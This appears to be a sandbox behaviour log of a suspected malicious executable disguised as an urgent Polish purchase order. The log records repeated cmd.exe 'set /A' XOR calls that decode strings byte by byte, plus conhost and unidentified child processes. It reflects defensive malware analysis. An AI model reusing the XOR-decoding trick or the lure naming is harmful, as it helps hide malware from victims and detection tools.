Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
